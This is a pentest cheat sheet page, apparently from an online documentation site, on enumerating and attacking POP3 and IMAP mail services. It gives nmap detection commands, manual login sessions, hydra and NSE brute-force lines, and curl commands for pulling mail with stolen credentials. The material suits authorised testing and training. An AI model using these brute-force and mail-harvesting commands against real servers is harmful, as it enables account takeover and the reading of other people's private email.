> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# 110 / 143 - POP3 / IMAP

> POP3 and IMAP enumeration: login, email harvesting, brute-force, and credential extraction.

## Service Detection

```bash theme={"dark"}
nmap -sV -sC -p 110,143,993,995 TARGET
```

***

## POP3 (Port 110 / 995 TLS)

### Manual Login

```bash theme={"dark"}
nc -nv TARGET 110
USER admin
PASS password
LIST
RETR 1
QUIT
```

### OpenSSL (TLS)

```bash theme={"dark"}
openssl s_client -connect TARGET:995
```

### Commands

| Command       | Description        |
| ------------- | ------------------ |
| `USER <user>` | Set username       |
| `PASS <pass>` | Set password       |
| `LIST`        | List messages      |
| `RETR <n>`    | Retrieve message n |
| `DELE <n>`    | Delete message n   |
| `QUIT`        | Disconnect         |

***

## IMAP (Port 143 / 993 TLS)

### Manual Login

```bash theme={"dark"}
nc -nv TARGET 143
a1 LOGIN user password
a2 LIST "" "*"
a3 SELECT INBOX
a4 FETCH 1 BODY[]
a5 LOGOUT
```

### OpenSSL (TLS)

```bash theme={"dark"}
openssl s_client -connect TARGET:993
```

### Commands

| Command           | Description       |
| ----------------- | ----------------- |
| `LOGIN user pass` | Authenticate      |
| `LIST "" "*"`     | List mailboxes    |
| `SELECT INBOX`    | Open inbox        |
| `SEARCH ALL`      | List all messages |
| `FETCH n BODY[]`  | Read message n    |
| `LOGOUT`          | Disconnect        |

***

## Brute-Force

### POP3

```bash theme={"dark"}
hydra -L users.txt -P passwords.txt pop3://TARGET
hydra -L users.txt -P passwords.txt pop3s://TARGET
```

### IMAP

```bash theme={"dark"}
hydra -L users.txt -P passwords.txt imap://TARGET
hydra -L users.txt -P passwords.txt imaps://TARGET
```

***

## Harvest Emails

### Download All via POP3

```bash theme={"dark"}
# Using curl
curl -u user:password pop3://TARGET/1
```

### Using Evolution / Thunderbird

Configure client with stolen credentials to browse all mail.

***

## NSE Scripts

```bash theme={"dark"}
nmap -p 110 --script pop3-brute TARGET
nmap -p 143 --script imap-brute TARGET
nmap -p 110 --script pop3-capabilities TARGET
nmap -p 143 --script imap-capabilities TARGET
```

***

## Quick Reference

| Check      | Command                                        |
| ---------- | ---------------------------------------------- |
| POP3 login | `nc TARGET 110` → `USER/PASS`                  |
| IMAP login | `nc TARGET 143` → `LOGIN user pass`            |
| POP3 brute | `hydra -L users.txt -P pass.txt pop3://TARGET` |
| IMAP brute | `hydra -L users.txt -P pass.txt imap://TARGET` |
